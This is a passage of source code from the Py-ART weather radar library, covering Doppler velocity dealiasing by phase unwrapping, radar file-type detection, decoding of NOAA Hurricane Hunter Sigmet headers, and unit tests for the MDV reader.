the Radar object. The Nyquist velocity of the first sweep is used
for all dealiasing unless the unwrap_unit is 'sweep' when the
velocities of each sweep are used.
check_nyquist_uniform : bool, optional
True to check if the Nyquist velocities are uniform for all rays
within a sweep, False will skip this check. This parameter is ignored
when the nyquist_velocity parameter is not None.
gatefilter : GateFilter, None or False, optional.
A GateFilter instance which specified which gates should be
ignored when performing de-aliasing. A value of None created this
filter from the radar moments using any additional arguments by
passing them to :py:func:`moment_based_gate_filter`. False, the
default, disables filtering including all gates in the dealiasing.
rays_wrap_around : bool or None, optional
True when the rays at the beginning of the sweep and end of the sweep
should be interpreted as connected when de-aliasing (PPI scans).
False if they edges should not be interpreted as connected (other scan
types). None will determine the correct value from the radar
scan type.
keep_original : bool, optional
True to retain the original Doppler velocity values at gates
where the dealiasing procedure fails or was not applied. False
does not replacement and these gates will be masked in the corrected
velocity field.
vel_field : str, optional
Field in radar to use as the Doppler velocities during dealiasing.
None will use the default field name from the Py-ART configuration
file.
corr_vel_field : str, optional
Name to use for the dealiased Doppler velocity field metadata. None
will use the default field name from the Py-ART configuration file.
skip_checks : bool
True to skip checks verifing that an appropiate unwrap_unit is
selected, False retains these checked. Setting this parameter to True
is not recommended and is only offered as an option for extreme cases.
Returns
-------
corr_vel : dict
Field dictionary containing dealiased Doppler velocities. Dealiased
array is stored under the 'data' key.
References
----------
.. [1] <NAME>, <NAME>, <NAME>,
and <NAME>, "Fast two-dimensional phase-unwrapping
algorithm based on sorting by reliability following a noncontinuous
path", Journal Applied Optics, Vol. 41, No. 35 (2002) 7437,
.. [2] <NAME>., <NAME>., <NAME>., & <NAME>., "Fast
three-dimensional phase-unwrapping algorithm based on sorting by
reliability following a non-continuous path. In <NAME>,
<NAME>, & <NAME> (Eds.), Optical Metrology (2005) 32--40,
International Society for Optics and Photonics.
"""
vel_field, corr_vel_field = _parse_fields(vel_field, corr_vel_field)
gatefilter = _parse_gatefilter(gatefilter, radar, **kwargs)
rays_wrap_around = _parse_rays_wrap_around(rays_wrap_around, radar)
nyquist_vel = _parse_nyquist_vel(nyquist_vel, radar, check_nyquist_uniform)
if not skip_checks:
_verify_unwrap_unit(radar, unwrap_unit)
# exclude masked and invalid velocity gates
gatefilter.exclude_masked(vel_field)
gatefilter.exclude_invalid(vel_field)
gfilter = gatefilter.gate_excluded
# raw vel. data possibly with masking
raw_vdata = radar.fields[vel_field]['data']
vdata = raw_vdata.view(np.ndarray) # mask removed
# perform dealiasing
if unwrap_unit == 'ray':
# 1D unwrapping does not use the gate filter nor respect
# masked gates in the rays. No information from the radar object is
# needed for the unfolding
data = _dealias_unwrap_1d(vdata, nyquist_vel)
elif unwrap_unit == 'sweep':
data = _dealias_unwrap_2d(
radar, vdata, nyquist_vel, gfilter, rays_wrap_around)
elif unwrap_unit == 'volume':
data = _dealias_unwrap_3d(
radar, vdata, nyquist_vel, gfilter, rays_wrap_around)
else:
message = ("Unknown `unwrap_unit` parameter, must be one of"
"'ray', 'sweep', or 'volume'")
raise ValueError(message)
# mask filtered gates
if np.any(gfilter):
data = np.ma.array(data, mask=gfilter)
# restore original values where dealiasing not applied
if keep_original:
data[gfilter] = raw_vdata[gfilter]
# return field dictionary containing dealiased Doppler velocities
corr_vel = get_metadata(corr_vel_field)
corr_vel['data'] = data
return corr_vel
def _dealias_unwrap_3d(radar, vdata, nyquist_vel, gfilter, rays_wrap_around):
""" Dealias using 3D phase unwrapping (full volume at once). """
# form cube and scale to phase units
nyquist_vel = nyquist_vel[0] # must be uniform, not checked
shape = (radar.nsweeps, -1, radar.ngates)
scaled_cube = (np.pi * vdata / nyquist_vel).reshape(shape)
filter_cube = gfilter.reshape(shape)
# perform unwrapping
wrapped = np.require(scaled_cube, np.float64, ['C'])
mask = np.require(filter_cube, np.uint8, ['C'])
unwrapped = np.empty_like(wrapped, dtype=np.float64, order='C')
unwrap_3d(wrapped, mask, unwrapped, [False, rays_wrap_around, False])
# scale back to velocity units
unwrapped_cube = unwrapped * nyquist_vel / np.pi
unwrapped_volume = unwrapped_cube.reshape(-1, radar.ngates)
unwrapped_volume = unwrapped_volume.astype(vdata.dtype)
return unwrapped_volume
def _dealias_unwrap_1d(vdata, nyquist_vel):
""" Dealias using 1D phase unwrapping (ray-by-ray) """
# nyquist_vel is only available sweep by sweep which has been lost at
# this point. Metioned in the documentation
nyquist_vel = nyquist_vel[0]
data = np.empty_like(vdata)
for i, ray in enumerate(vdata):
# extract ray and scale to phase units
scaled_ray = ray * np.pi / nyquist_vel
# perform unwrapping
wrapped = np.require(scaled_ray, np.float64, ['C'])
unwrapped = np.empty_like(wrapped, dtype=np.float64, order='C')
unwrap_1d(wrapped, unwrapped)
# scale back into velocity units and store
data[i] = unwrapped * nyquist_vel / np.pi
return data
def _dealias_unwrap_2d(radar, vdata, nyquist_vel, gfilter, rays_wrap_around):
""" Dealias using 2D phase unwrapping (sweep-by-sweep). """
data = np.zeros_like(vdata)
for nsweep, sweep_slice in enumerate(radar.iter_slice()):
# extract sweep and scale to phase units
sweep_nyquist_vel = nyquist_vel[nsweep]
scaled_sweep = vdata[sweep_slice] * np.pi / sweep_nyquist_vel
sweep_mask = gfilter[sweep_slice]
# perform unwrapping
wrapped = np.require(scaled_sweep, np.float64, ['C'])
mask = np.require(sweep_mask, np.uint8, ['C'])
unwrapped = np.empty_like(wrapped, dtype=np.float64, order='C')
unwrap_2d(wrapped, mask, unwrapped, [rays_wrap_around, False])
# scale back into velocity units and store
data[sweep_slice, :] = unwrapped * sweep_nyquist_vel / np.pi
return data
def _verify_unwrap_unit(radar, unwrap_unit):
"""
Verify that the radar supports the requested unwrap unit
raises a ValueError if the unwrap_unit is not supported.
"""
if unwrap_unit == 'sweep' or unwrap_unit == 'volume':
if _is_radar_sequential(radar) is False:
mess = ("rays are not sequentially ordered, must use 'ray' "
"unwrap_unit.")
raise ValueError(mess)
if unwrap_unit == 'volume':
if _is_radar_cubic(radar) is False:
mess = "Non-cubic radar volume, 'volume' unwrap_unit invalid. "
raise ValueError(mess)
if _is_radar_sweep_aligned(radar) is False:
mess = ("Angle in sequential sweeps in radar volumes are not "
"aligned, 'volume unwrap_unit invalid")
raise ValueError(mess)
def _is_radar_cubic(radar):
""" Test if a radar is cubic (sweeps have the same number of rays). """
rays_per_sweep = radar.rays_per_sweep['data']
return bool(np.all(rays_per_sweep == rays_per_sweep[0]))
def _is_radar_sweep_aligned(radar, diff=0.1):
"""
Test that all sweeps in the radar sample nearly the same angles.
Test that the maximum difference in sweep sampled angles is below
`diff` degrees. The radar should first be tested to verify that is cubic
before calling this function using the _is_radar_cubic function.
"""
if radar.nsweeps == 1:
return True # all single sweep volume are sweep aligned
if radar.scan_type == 'ppi':
angles = radar.azimuth['data']
elif radar.scan_type == 'rhi':
angles = radar.elevation['data']
else:
raise ValueError('invalid scan_type: %s' % (radar.scan_type))
starts = radar.sweep_start_ray_index['data']
ends = radar.sweep_end_ray_index['data']
ref_angles = angles[starts[0]:ends[0] + 1]
for start, end in zip(starts, ends):
test_angles = angles[start:end+1]
if np.any(np.abs(test_angles - ref_angles) > diff):
return False
return True
def _is_radar_sequential(radar):
""" Test if all sweeps in radar are sequentially ordered. """
for i in range(radar.nsweeps):
if not _is_sweep_sequential(radar, i):
return False
return True
def _is_sweep_sequential(radar, sweep_number):
""" Test if a specific sweep is sequentially ordered. """
start = radar.sweep_start_ray_index['data'][sweep_number]
end = radar.sweep_end_ray_index['data'][sweep_number]
if radar.scan_type == 'ppi':
angles = radar.azimuth['data'][start:end+1]
elif radar.scan_type == 'rhi':
angles = radar.elevation['data'][start:end+1]
elif radar.scan_type == 'vpt':
# for VPT scan time should not run backwards, so time is the
# equivalent variable to an angle.
angles = radar.time['data']
else:
raise ValueError('invalid scan_type: %s' % (radar.scan_type))
rolled_angles = np.roll(angles, -np.argmin(angles))
return np.all(np.diff(rolled_angles) >= 0)
```
#### File: pyart/io/auto_read.py
```python
import bz2
import gzip
import netCDF4
from . import _RSL_AVAILABLE
if _RSL_AVAILABLE:
from .rsl import read_rsl
from .mdv_radar import read_mdv
from .cfradial import read_cfradial
from .sigmet import read_sigmet
from .nexrad_archive import read_nexrad_archive
from .nexrad_cdm import read_nexrad_cdm
from .nexradl3_read import read_nexrad_level3
from .uf import read_uf
from .chl import read_chl
def read(filename, use_rsl=False, **kwargs):
"""
Read a radar file and return a radar object.
Additional parameters are passed to the underlying read_* function.
Parameters
----------
filename : str
Name of radar file to read
use_rsl : bool
True will use the TRMM RSL library to read files which are supported
both natively and by RSL. False will choose the native read function.
RSL will always be used to read a file if it is not supported
natively.
Other Parameters
-------------------
field_names : dict, optional
Dictionary mapping file data type names to radar field names. If a
data type found in the file does not appear in this dictionary or has
a value of None it will not be placed in the radar.fields dictionary.
A value of None, the default, will use the mapping defined in the
metadata configuration file.
additional_metadata : dict of dicts, optional
Dictionary of dictionaries to retrieve metadata from during this read.
This metadata is not used during any successive file reads unless
explicitly included. A value of None, the default, will not
introduct any addition metadata and the file specific or default
metadata as specified by the metadata configuration file will be used.
file_field_names : bool, optional
True to use the file data type names for the field names. If this
case the field_names parameter is ignored. The field dictionary will
likely only have a 'data' key, unless the fields are defined in
`additional_metadata`.
exclude_fields : list or None, optional
List of fields to exclude from the radar object. This is applied
after the `file_field_names` and `field_names` parameters.
delay_field_loading : bool
True to delay loading of field data from the file until the 'data'
key in a particular field dictionary is accessed. In this case
the field attribute of the returned Radar object will contain
LazyLoadDict objects not dict objects. Not all file types support this
parameter.
Returns
-------
radar : Radar
Radar object. A TypeError is raised if the format cannot be
determined.
"""
filetype = determine_filetype(filename)
# Bzip, uncompress and see if we can determine the type
if filetype == 'BZ2':
bzfile = bz2.BZ2File(filename)
try:
radar = read(bzfile, use_rsl, **kwargs)
except:
raise ValueError(
'Bzip file cannot be read compressed, '
'uncompress and try again')
finally:
bzfile.close()
return radar
# Gzip, uncompress and see if we can determine the type
if filetype == 'GZ':
gzfile = gzip.open(filename, 'rb')
try:
radar = read(gzfile, use_rsl, **kwargs)
except:
raise ValueError(
'Gzip file cannot be read compressed, '
'uncompress and try again')
finally:
gzfile.close()
return radar
# Py-ART only supported formats
if filetype == "MDV":
return read_mdv(filename, **kwargs)
if filetype == "NETCDF3" or filetype == "NETCDF4":
dset = netCDF4.Dataset(filename)
if 'cdm_data_type' in dset.ncattrs(): # NEXRAD CDM
dset.close()
return read_nexrad_cdm(filename, **kwargs)
else:
dset.close()
return read_cfradial(filename, **kwargs) # CF/Radial
if filetype == 'WSR88D':
return read_nexrad_archive(filename, **kwargs)
if filetype == 'CHL':
return read_chl(filename, **kwargs)
if filetype == 'NEXRADL3':
return read_nexrad_level3(filename, **kwargs)
# RSL supported formats which are also supported natively in Py-ART
if filetype == "SIGMET":
if use_rsl:
return read_rsl(filename, **kwargs)
else:
return read_sigmet(filename, **kwargs)
if filetype == "UF":
if use_rsl:
return read_rsl(filename, **kwargs)
else:
return read_uf(filename, **kwargs)
# RSL only supported file formats
rsl_formats = ['HDF4', 'RSL', 'DORAD', 'LASSEN']
if filetype in rsl_formats and _RSL_AVAILABLE:
return read_rsl(filename, **kwargs)
raise TypeError('Unknown or unsupported file format: ' + filetype)
def determine_filetype(filename):
"""
Return the filetype of a given file by examining the first few bytes.
The following filetypes are detected:
* 'MDV'
* 'NETCDF3'
* 'NETCDF4'
* 'WSR88D'
* 'NEXRADL3'
* 'UF'
* 'HDF4'
* 'RSL'
* 'DORAD'
* 'SIGMET'
* 'LASSEN'
* 'BZ2'
* 'GZ'
* 'UNKNOWN'
Parameters
----------
filename : str
Name of file to examine.
Returns
-------
filetype : str
Type of file.
"""
# TODO
# detect the following formats, those supported by RSL
# 'RADTEC', the SPANDAR radar at Wallops Island, VA
# 'MCGILL', McGill S-band
# 'TOGA', DYNAMO project's radar
# 'RAPIC', Berrimah Australia
# 'RAINBOW'
# read the first 12 bytes from the file
try:
f = open(filename, 'rb')
begin = f.read(12)
f.close()
except TypeError:
f = filename
begin = f.read(12)
f.seek(-12, 1)
# MDV, read with read_mdv
# MDV format signature from MDV FORMAT Interface Control Document (ICD)
# recond_len1, struct_id, revision_number
# 1016, 14142, 1
# import struct
# mdv_signature = struct.pack('>3i', 1016, 14142, 1)
mdv_signature = b'\x00\x00\x03\xf8\x00\x007>\x00\x00\x00\x01'
if begin[:12] == mdv_signature:
return "MDV"
# CSU-CHILL
# begins with ARCH_ID_FILE_HDR = 0x5aa80004
# import struct
# struct.pack('<i', 0x5aa80004)
chl_signature = b'\x04\x00\xa8Z'
if begin[:4] == chl_signature:
return "CHL"
# NetCDF3, read with read_cfradial
if begin[:3] == b"CDF":
return "NETCDF3"
# NetCDF4, read with read_cfradial, contained in a HDF5 container
# HDF5 format signature from HDF5 specification documentation
hdf5_signature = b'\x89\x48\x44\x46\x0d\x0a\x1a\x0a'
if begin[:8] == hdf5_signature:
return "NETCDF4"
# NEXRAD LEVEL 3 begin with SDUSXX KXXX
nexrad_l3_signature = b'SDUS'
if begin[:4] == b'SDUS':
return "NEXRADL3"
# Other files should be read with read_rsl
# WSR-88D begin with ARCHIVE2. or AR2V000
if begin[:9] == b'ARCHIVE2.' or begin[:7] == b'AR2V000':
return "WSR88D"
# Universal format has UF in bytes 0,1 or 2,3 or 4,5
if begin[:2] == b"UF" or begin[2:4] == b"UF" or begin[4:6] == b"UF":
return "UF"
# DORADE files
if begin[:4] == b"SSWB" or begin[:4] == b"VOLD" or begin[:4] == b"COMM":
return "DORADE"
# LASSEN
if begin[4:11] == b'SUNRISE':
return "LASSEN"
# RSL file
if begin[:3] == b"RSL":
return "RSL"
# HDF4 file
# HDF4 format signature from HDF4 specification documentation
hdf4_signature = b'\x0e\x03\x13\x01'
if begin[:4] == hdf4_signature:
return "HDF4"
# SIGMET files
# SIGMET format is a structure_header with a Product configuration
# indicator (see section 4.2.47)
# sigmet_signature = chr(27)
sigmet_signature = b'\x1b'
if begin[0:1] == sigmet_signature:
return "SIGMET"
# bzip2 compressed files
bzip2_signature = b'BZh'
if begin[:3] == bzip2_signature:
return 'BZ2'
gzip_signature = b'\x1f\x8b'
if begin[:2] == gzip_signature:
return 'GZ'
# Cannot determine filetype
return "UNKNOWN"
```
#### File: pyart/io/_sigmet_noaa_hh.py
```python
import numpy as np
from ._sigmetfile import bin4_to_angle, bin2_to_angle
def _decode_noaa_hh_hdr(
raw_extended_headers, filemetadata, azimuth, elevation,
position_source='irs', heading_source='irs'):
"""
Extract data from Sigmet extended headers produced by NOAA
Hurricane Hunter airborne radars.
Parameters
----------
raw_extended_headers : ndarray
Raw Sigmet extended headers.
filemetadata : FileMetadata
FileMetadata class from which metadata will be derived.
azimuth : dict
Dictionary of azimuth angles recorded in Sigmet file.
elevation : dict
Dictionary of elevation angles recorded in Sigmet file.
position_source: {'irs', 'gps', 'aamps'}, optional
Instrument from which to derive position parameters.
heading_source: {'irs', 'aamps'}
Instrument from which to derive heading parameters.
Returns
-------
latitude : dict
Dictionary containing latitude data and metadata.
longitude : dict
Dictionary containing longitude data and metadata.
altitude : dict
Dictionary containing altitude data and metadata.
heading_params : dict
Dictionary of dictionary containing aircraft heading data and
metadata. Contains 'heading', 'roll', pitch', 'drift', 'rotation',
'tilt' and 'georefs_applied' dictionaries.
"""
xhdr = np.rec.fromstring(raw_extended_headers[..., :68].tostring(),
dtype=list(NOAA_HH_EXTENDED_HEADER))
# rotation and tilt from azimuth/elevation angles
rotation = filemetadata('rotation')
tilt = filemetadata('tilt')
rotation_data = 90. - elevation['data'].copy()
rotation_data[rotation_data < 0] += 360.
rotation['data'] = rotation_data
tilt_data = azimuth['data'].copy()
tilt_data[tilt_data > 180] -= 360.
tilt['data'] = tilt_data
# airborne parameters
heading = filemetadata('heading')
roll = filemetadata('roll')
pitch = filemetadata('pitch')
drift = filemetadata('drift')
if heading_source == 'irs':
heading_data = bin2_to_angle(xhdr['irs_heading'])
roll_data = bin2_to_angle(xhdr['irs_roll'])
pitch_data = bin2_to_angle(xhdr['irs_pitch'])
drift_data = bin2_to_angle(xhdr['irs_drift'])
elif heading_source == 'aamps':
heading_data = bin2_to_angle(xhdr['aamps_heading'])
roll_data = bin2_to_angle(xhdr['aamps_roll'])
pitch_data = bin2_to_angle(xhdr['aamps_pitch'])
drift_data = bin2_to_angle(xhdr['aamps_drift'])
else:
raise ValueError('Unknown heading_source')
heading['data'] = heading_data
roll['data'] = roll_data
pitch['data'] = pitch_data
drift['data'] = drift_data
# georeferenced azimuth and elevation
az, elev = _georeference_yprime(
roll_data, pitch_data, heading_data, drift_data, rotation_data,
tilt_data)
azimuth['data'] = az
elevation['data'] = elev
georefs_applied = filemetadata('georefs_applied')
georefs_applied['data'] = np.ones(az.shape, dtype='int8')
# positions: latitude, longitude, altitude
latitude = filemetadata('latitude')
longitude = filemetadata('longitude')
altitude = filemetadata('altitude')
if position_source == 'gps':
lat_data = bin4_to_angle(xhdr['gps_lat'])
lon_data = bin4_to_angle(xhdr['gps_long'])
alt_data = xhdr['gps_alt'] / 100.
elif position_source == 'aamps':
lat_data = bin4_to_angle(xhdr['aamps_lat'])
lon_data = bin4_to_angle(xhdr['aamps_long'])
alt_data = xhdr['aamps_alt'] / 100.
elif position_source == 'irs':
lat_data = bin4_to_angle(xhdr['irs_lat'])
lon_data = bin4_to_angle(xhdr['irs_long'])
alt_data = xhdr['gps_alt'] / 100.
else:
raise ValueError('Invalid position_source')
latitude['data'] = lat_data
longitude['data'] = lon_data
altitude['data'] = alt_data
extended_header_params = {
'heading': heading,
'roll': roll,
'pitch': pitch,
'drift': drift,
'rotation': rotation,
'tilt': tilt,
'georefs_applied': georefs_applied}
return (latitude, longitude, altitude, extended_header_params)
def _georeference_yprime(roll, pitch, heading, drift, rotation, tilt):
"""
Compute georeferenced azimuth and elevation angles for a Y-prime radar.
This is the georeferencing needed for the tail doppler radar on the
NOAA P3 aircraft.
"""
# Adapted from Radx's SigmetRadxFile::_computeAzEl method found in
# SigmetRadxFile.cc
# Transforms defined in Wen-Chau Lee et al, JTech, 1994, 11, 572-578.
# Convert to radians and use variable names from Wen-Chau Lee paper
R = np.radians(roll) # roll
P = np.radians(pitch) # pitch
H = np.radians(heading) # heading
D = np.radians(drift) # drift
T = H + D # track
theta_a = np.radians(rotation)
tau_a = np.radians(tilt)
# Eq. (9)
x_t = (np.cos(theta_a + R) * np.sin(D) * np.cos(tau_a) * np.sin(P) +
np.cos(D) * np.sin(theta_a + R) * np.cos(tau_a) -
np.sin(D) * np.cos(P) * np.sin(tau_a))
y_t = (-np.cos(theta_a + R) * np.cos(D) * np.cos(tau_a) * np.sin(P) +
np.sin(D) * np.sin(theta_a + R) * np.cos(tau_a) +
np.cos(P) * np.cos(D) * np.sin(tau_a))
z_t = (np.cos(P) * np.cos(tau_a) * np.cos(theta_a + R) +
np.sin(P) * np.sin(tau_a))
# Eq. (12) and discussion after Eq. (17)
lambda_t = np.arctan2(x_t, y_t)
azimuth = np.fmod(lambda_t + T, 2 * np.pi)
# Eq (17)
elevation = np.arcsin(z_t)
# convert to degrees and fix range
azimuth = np.degrees(azimuth)
azimuth[azimuth < 0] += 360.
elevation = np.degrees(elevation)
elevation[elevation > 180] -= 360.
return azimuth, elevation
# NOAA Hurrican Hunter Sigmet Extended header structure
# scalar definitions
UINT16 = 'H'
INT16 = 'h'
BAM16 = 'h'
INT32 = 'i'
BAM32 = 'i'
NOAA_HH_EXTENDED_HEADER = (
('msecs_since_sweep_start', INT32),
('calib_signal_level', INT16),
('nbytes_in_header', INT16),
('__pad_1', UINT16),
('gps_age', UINT16), # Time in milliseconds since last GPS Input
('irs_age', UINT16), # Time in milliseconds since last IRS Input
('aamps_age', UINT16), # Time in milliseconds since last
# AAMPS Input
('gps_lat', BAM32), # GPS latitude (BAM)
('gps_long', BAM32), # GPS Longitude (BAM)
('gps_alt', INT32), # GPS Altitude (cm)
('gps_vel_e', INT32), # GPS Ground Speed East (cm/second)
('gps_vel_n', INT32), # GPS Ground Speed North (cm/second)
('gps_vel_v', INT32), # GPS Ground Speed Up (cm/second)
('irs_lat', BAM32), # IRS latitude (BAM)
('irs_long', BAM32), # IRS Longitude (BAM)
('irs_vel_e', INT32), # IRS Ground Speed East (cm/second)
('irs_vel_n', INT32), # IRS Ground Speed North (cm/second)
('irs_vel_v', INT32), # IRS Ground Speed Up (cm/second)
('irs_pitch', BAM16), # IRS Pitch (BAM)
('irs_roll', BAM16), # IRS Roll (BAM)
('irs_heading', BAM16), # IRS Heading (BAM)
('irs_drift', BAM16), # IRS Drift (BAM)
('irs_tru_track', BAM16), # IRS True Track (BAM)
('irs_pitch_r', BAM16), # IRS Pitch rate (BAM/sec)
('irs_roll_r', BAM16), # IRS Roll rate (BAM/sec)
('irs_yaw_r', BAM16), # IRS Yaw rate (BAM/sec)
('irs_wind_vel', INT32), # IRS Wind speed (cm/second)
('irs_wind_dir', BAM16), # IRS Wind direction (BAM)
('__pad_2', UINT16),
('aamps_lat', BAM32), # AAMPS latitude (BAM)
('aamps_long', BAM32), # AAMPS Longitude (BAM)
('aamps_alt', INT32), # AAMPS Altitude (cm)
('aamps_ground_vel', INT32), # AAMPS Ground Speed East (cm/second)
('aamps_time_stamp', INT32), # AAMPS Timestamp in UTC
# (seconds since the epoch)
('aamps_vel_v', INT32), # AAMPS Vertical Velocity (cm/second)
('aamps_pitch', BAM16), # AAMPS Pitch (BAM)
('aamps_roll', BAM16), # AAMPS Roll (BAM)
('aamps_heading', BAM16), # AAMPS Heading (BAM)
('aamps_drift', BAM16), # AAMPS Drift (BAM)
('aamps_track', BAM16), # AAMPS Track (BAM)
('__pad_4', UINT16),
('aamps_radalt_val', INT32), # AAMPS Radar Altitude (cm)
('aamps_wind_vel', INT32), # AAMPS Wind Speed (cm/second)
('aamps_wind_dir', BAM16), # AAMPS Wind direction (BAM)
('__pad_5', UINT16),
('aamps_wind_vel_v', INT32), # AAMPS Wind Speed Up (cm/second)
)
```
#### File: io/tests/test_mdv_radar.py
```python
import numpy as np
from numpy.testing import assert_almost_equal
from numpy.ma.core import MaskedArray
import pyart
############################################
# read_mdv tests (verify radar attributes) #
############################################
# read in the sample file and create a a Radar object
radar = pyart.io.read_mdv(pyart.testing.MDV_PPI_FILE)
# time attribute
def test_time():
assert 'comment' in radar.time.keys()
assert 'long_name' in radar.time.keys()
assert 'standard_name' in radar.time.keys()
assert 'units' in radar.time.keys()
assert 'calendar' in radar.time.keys()
assert 'data' in radar.time.keys()
assert radar.time['units'] == 'seconds since 2011-05-20T11:01:00Z'
assert radar.time['data'].shape == (360, )
assert_almost_equal(radar.time['data'][200], 187, 0)
# range attribute
def test_range():
assert 'long_name' in radar.range
assert 'standard_name' in radar.range
assert 'meters_to_center_of_first_gate' in radar.range
assert 'meters_between_gates' in radar.range
assert 'units' in radar.range
assert 'data' in radar.range
assert 'spacing_is_constant' in radar.range
assert radar.range['data'].shape == (110, )
assert_almost_equal(radar.range['data'][0], 118, 0)
# fields attribute is tested later
# metadata attribute
def test_metadata():
assert 'instrument_name' in radar.metadata
assert 'source' in radar.metadata
# scan_type attribute
def test_scan_type():
assert radar.scan_type == 'ppi'
# latitude attribute
def test_latitude():
assert 'data' in radar.latitude
assert 'standard_name' in radar.latitude
assert 'units' in radar.latitude
assert radar.latitude['data'].shape == (1, )
assert_almost_equal(radar.latitude['data'], 37, 0)
# longitude attribute
def test_longitude():
assert 'data' in radar.longitude
assert 'standard_name' in radar.longitude
assert 'units' in radar.longitude
assert radar.longitude['data'].shape == (1, )
assert_almost_equal(radar.longitude['data'], -97, 0)
# altitude attribute
def test_altitude():
assert 'data' in radar.altitude
assert 'standard_name' in radar.altitude
assert 'units' in radar.altitude
assert 'positive' in radar.altitude
assert radar.altitude['data'].shape == (1, )
assert_almost_equal(radar.altitude['data'], 328, 0)
# altitude_agl attribute
def test_altitude_agl():
assert radar.altitude_agl is None
# sweep_number attribute
def test_sweep_number():
assert 'standard_name' in radar.sweep_number
assert np.all(radar.sweep_number['data'] == range(1))
# sweep_mode attribute
def test_sweep_mode():
assert 'standard_name' in radar.sweep_mode
assert radar.sweep_mode['data'].shape == (1, )
assert radar.sweep_mode['data'].dtype.char == 'S'
assert np.all(radar.sweep_mode['data'] == [b'azimuth_surveillance'])
# fixed_angle attribute
def test_fixed_angle():
assert 'standard_name' in radar.fixed_angle
assert 'units' in radar.fixed_angle
assert radar.fixed_angle['data'].shape == (1, )
assert_almost_equal(radar.fixed_angle['data'][0], 0.75, 2)
# sweep_start_ray_index attribute
def test_sweep_start_ray_index():
assert 'long_name' in radar.sweep_start_ray_index
assert radar.sweep_start_ray_index['data'].shape == (1, )
assert_almost_equal(radar.sweep_start_ray_index['data'][0], 0, 0)
# sweep_end_ray_index attribute
def test_sweep_end_ray_index():
assert 'long_name' in radar.sweep_end_ray_index
assert radar.sweep_end_ray_index['data'].shape == (1, )
assert_almost_equal(radar.sweep_end_ray_index['data'][0], 359, 0)
# target_scan_rate attribute
def test_target_scan_rate():
assert radar.target_scan_rate is None
# azimuth attribute
def test_azimuth():
assert 'standard_name' in radar.azimuth
assert 'long_name' in radar.azimuth
assert 'units' in radar.azimuth
assert 'axis' in radar.azimuth
assert_almost_equal(radar.azimuth['data'][0], 0, 0)
assert_almost_equal(radar.azimuth['data'][10], 10.0, 0)
# elevation attribute
def test_elevation():
assert 'standard_name' in radar.elevation
assert 'long_name' in radar.azimuth
assert 'units' in radar.elevation
assert 'axis' in radar.elevation
assert radar.elevation['data'].shape == (360, )
assert_almost_equal(radar.elevation['data'][0], 0.75, 2)
# scan_rate attribute
def test_scan_rate():
assert radar.scan_rate is None
# antenna_transition attribute
def test_antenna_transition():
assert radar.antenna_transition is None
# instrument_parameters attribute
def test_instument_parameters():
# instrument_parameter sub-convention
keys = ['prt', 'unambiguous_range', 'prt_mode', 'nyquist_velocity']
for k in keys:
description = 'instrument_parameters: %s' % k
check_instrument_parameter.description = description
yield check_instrument_parameter, k
def check_instrument_parameter(param):
assert param in radar.instrument_parameters
param_dic = radar.instrument_parameters[param]
assert param_dic['meta_group'] == 'instrument_parameters'
# radar_parameters attribute
def test_radar_parameters():
# radar_parameter sub-convention
keys = ['radar_beam_width_h', 'radar_beam_width_v']
for k in keys:
description = 'radar_parameters: %s' % k
check_radar_parameter.description = description
yield check_radar_parameter, k
def check_radar_parameter(param):
assert param in radar.instrument_parameters
param_dic = radar.instrument_parameters[param]
assert param_dic['meta_group'] == 'radar_parameters'
# radar_calibration attribute
def test_radar_calibration():
assert radar.radar_calibration is None
# ngates attribute
def test_ngates():
assert radar.ngates == 110
# nrays attribute
def test_nrays():
assert radar.nrays == 360
# nsweeps attribute
def test_nsweeps():
assert radar.nsweeps == 1
####################
# fields attribute #
####################
def test_field_dics():
fields = ['reflectivity', ]
for field in fields:
description = "field : %s, dictionary" % field
check_field_dic.description = description
yield check_field_dic, field
def check_field_dic(field):
""" Check that the required keys are present in a field dictionary. """
assert 'standard_name' in radar.fields[field]
assert 'units' in radar.fields[field]
assert '_FillValue' in radar.fields[field]
assert 'coordinates' in radar.fields[field]
def test_field_shapes():
fields = ['reflectivity', ]
for field in fields:
description = "field : %s, shape" % field
check_field_shape.description = description
yield check_field_shape, field
def check_field_shape(field):
assert radar.fields[field]['data'].shape == (360, 110)
def test_field_types():
fields = {'reflectivity': MaskedArray, }
for field, field_type in fields.items():
description = "field : %s, type" % field
check_field_type.description = description
yield check_field_type, field, field_type
def check_field_type(field, field_type):
assert type(radar.fields[field]['data']) is field_type
def test_field_first_points():
# these values can be found using:
# [round(radar.fields[f]['data'][0,0]) for f in radar.fields]
fields = {'reflectivity': 24.0}
for field, field_value in fields.items():
description = "field : %s, first point" % field
check_field_first_point.description = description
yield check_field_first_point, field, field_value
def check_field_first_point(field, value):
assert_almost_equal(radar.fields[field]['data'][0, 0], value, 0)
#############
# RHI tests #
#############
RADAR_RHI = pyart.io.read_mdv(pyart.testing.MDV_RHI_FILE,
delay_field_loading=True)
# nsweeps attribute
def test_rhi_nsweeps():
assert RADAR_RHI.nsweeps == 1
# sweep_number attribute
def test_rhi_sweep_number():
assert 'standard_name' in RADAR_RHI.sweep_number
assert np.all(RADAR_RHI.sweep_number['data'] == range(1))
# sweep_mode attribute
def test_rhi_sweep_mode():
assert 'standard_name' in RADAR_RHI.sweep_mode
assert RADAR_RHI.sweep_mode['data'].shape == (1, )
assert np.all(RADAR_RHI.sweep_mode['data'] == [b'rhi'])
# fixed_angle attribute
def test_rhi_fixed_angle():
assert 'standard_name' in RADAR_RHI.fixed_angle
assert 'units' in RADAR_RHI.fixed_angle
assert RADAR_RHI.fixed_angle['data'].shape == (1, )
assert_almost_equal(RADAR_RHI.fixed_angle['data'][0], 189.00, 2)
# sweep_start_ray_index attribute
def test_rhi_sweep_start_ray_index():
assert 'long_name' in RADAR_RHI.sweep_start_ray_index
assert RADAR_RHI.sweep_start_ray_index['data'].shape == (1, )
assert_almost_equal(RADAR_RHI.sweep_start_ray_index['data'][0], 0, 0)
# sweep_end_ray_index attribute
def test_rhi_sweep_end_ray_index():
assert 'long_name' in RADAR_RHI.sweep_end_ray_index
assert RADAR_RHI.sweep_end_ray_index['data'].shape == (1, )
assert_almost_equal(RADAR_RHI.sweep_end_ray_index['data'][0], 282, 0)
# azimuth attribute
def test_rhi_azimuth():
assert 'standard_name' in RADAR_RHI.azimuth
assert 'long_name' in RADAR_RHI.azimuth
assert 'units' in RADAR_RHI.azimuth
assert 'axis' in RADAR_RHI.azimuth
assert_almost_equal(RADAR_RHI.azimuth['data'][0], 189, 0)
assert_almost_equal(RADAR_RHI.azimuth['data'][10], 189, 0)
# elevation attribute
def test_rhi_elevation():
assert 'standard_name' in RADAR_RHI.elevation
